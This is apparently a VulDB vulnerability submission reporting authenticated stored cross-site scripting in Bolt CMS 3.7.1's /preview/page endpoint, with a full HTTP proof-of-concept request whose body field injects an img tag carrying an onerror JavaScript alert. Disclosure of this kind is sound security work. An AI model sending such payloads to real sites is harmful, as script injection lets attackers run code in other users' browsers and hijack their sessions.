| Title | Bolt Bolt CMS 3.7.1 Improper Neutralization of Alternate XSS Syntax |
|---|
| Description | Bolt CMS 3.7.1 allows an authenticated user to insert an XSS script in the body field, and upon saving and previewing the entry, the script gets executed.
path: POST /preview/page
### PoC
POST /preview/page HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 461
Origin: http://localhost:8000
Connection: keep-alive
Referer: http://localhost:8000/bolt/editcontent/pages/3
Cookie: bolt_session_ec7e7f47cc07969a3929d5ef96ade419=daf873ae4458cb0d5c80b48320; bolt_authtoken_ec7e7f47cc07969a3929d5ef96ade419=82d5b17a9c2e618eaa9b3aaa95f66512a6dfc8372ce1acc3032cf6309a8323db
Upgrade-Insecure-Requests: 1
content_edit%5B_token%5D=_ATFj8R140etM6ZQq5RDQRBieszwQkVGKP1LDuokLvo&editreferrer=&contenttype=pages&title=TESTEEE&slug=testeee&image%5Bfile%5D=&files%5B%5D=&teaser=%3Cp%3ELOJA%3C%2Fp%3E%0D%0A&body=%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fimg%3E&template=record.twig&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=3&status=published&datepublish=2024-07-25+01%3A35%3A51&datedepublish=&ownerid=1&_live-editor-preview= |
|---|
| User | xMirandax (UID 72454) |
|---|
| Submission | 07/25/2024 04:43 (2 years ago) |
|---|
| Moderation | 07/30/2024 17:33 (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 273167 [Bolt CMS 3.7.1 Entry Preview /preview/page body cross site scripting] |
|---|
| Points | 17 |
|---|